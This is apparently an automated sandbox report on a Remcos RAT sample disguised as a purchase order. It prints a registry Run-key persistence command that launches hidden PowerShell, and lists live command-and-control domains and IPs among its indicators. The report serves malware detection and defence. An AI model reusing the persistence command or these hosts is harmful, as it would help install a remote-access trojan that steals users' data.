Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "insecta" /t reg_expand_sz /d "%fumigatorium% -windowstyle minimized $hysterogenic=(get-itemproperty -path 'hkcu:\stafetlbenes\').indsbedes;%fumigatorium% ($hysterogenic)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "insecta" /t reg_expand_sz /d "%fumigatorium% -windowstyle minimized $hysterogenic=(get-itemproperty -path 'hkcu:\stafetlbenes\').indsbedes;%fumigatorium% ($hysterogenic)"			Jump to behavior

Source: wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerN
Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerN=8f08
Source: wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerX
Source: wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerS
Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

0_2_00403645

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7188, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7188, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Obfuscated Files or Information	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	11 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	212 Process Injection	1 Software Packing	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	213 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO-USC-22USC-KonchoCo.exe	16%	ReversingLabs
PO-USC-22USC-KonchoCo.exe	11%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe	16%	ReversingLabs
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe	11%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
learfo55ozj02.duckdns.org	1%	Virustotal	Browse
enelltd.top	1%	Virustotal	Browse
geoplugin.net	4%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://geoplugin.net/json.gpD	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpg	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpq	0%	Avira URL Cloud	safe
learfo55ozj02.duckdns.org	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gp:	0%	Avira URL Cloud	safe
learfo55ozj02.duckdns.org	1%	Virustotal		Browse
http://geoplugin.net/json.gp:	0%	Virustotal		Browse
http://geoplugin.net/json.gpq	0%	Virustotal		Browse
http://geoplugin.net/json.gpg	0%	Virustotal		Browse
http://geoplugin.net/json.gpD	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
learfo55ozj02.duckdns.org	193.222.96.21	true	true	1%, Virustotal, Browse	unknown
enelltd.top	104.21.45.139	true	false	1%, Virustotal, Browse	unknown
geoplugin.net	178.237.33.50	true	false	4%, Virustotal, Browse	unknown
leirfo45ozj01.duckdns.org	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	true	URL Reputation: phishing URL Reputation: phishing	unknown
learfo55ozj02.duckdns.org	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gpD	wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpd	wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpg	wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.3483439341.0000000004881000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3487057946.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://geoplugin.net/json.gpq	wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	PO-USC-22USC-KonchoCo.exe, 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO-USC-22USC-KonchoCo.exe, 00000000.00000000.1615338710.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.3483439341.0000000004881000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp:	wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
104.21.45.139	enelltd.top	United States	13335	CLOUDFLARENETUS	false
193.222.96.21	learfo55ozj02.duckdns.org	Germany	3303	SWISSCOMSwisscomSwitzerlandLtdCH	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1435466
Start date and time:	2024-05-02 18:58:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO-USC-22USC-KonchoCo.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1127/14@8/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 93% Number of executed functions: 95 Number of non-executed functions: 43
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7764 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:01:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Insecta %Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)
18:01:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Insecta %Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)
18:58:54	API Interceptor	28x Sleep call for process: powershell.exe modified
19:02:34	API Interceptor	63x Sleep call for process: wab.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
178.237.33.50	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	GVV.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Evgh. rvs Armenia. 30.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	202404294766578200.xlam.xlsx	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
104.21.45.139	NewCPhong.exe	Get hash	malicious	Unknown	Browse
193.222.96.21	Evgh. rvs Armenia. 30.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse
	.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse
	z39103_PN-EN-1090-1_A1_2012P.exe	Get hash	malicious	GuLoader, Remcos	Browse
	z6FORMATOPROVEEDORESMETAX.exe	Get hash	malicious	GuLoader, Remcos	Browse
	z77EU17439-FT-MILKYLUXGOUDAMILD.exe	Get hash	malicious	GuLoader, Remcos	Browse
	sample.exe	Get hash	malicious	GuLoader, Remcos	Browse
	Copy of Noyan Order Form Global Importing Group 2024.exe	Get hash	malicious	GuLoader, Remcos	Browse
	Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe	Get hash	malicious	GuLoader, Remcos	Browse
	107. PN-EN-1090-2+A1_2012P.exe	Get hash	malicious	GuLoader, Remcos	Browse
	#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe	Get hash	malicious	GuLoader, Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
learfo55ozj02.duckdns.org	Evgh. rvs Armenia. 30.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.222.96.21
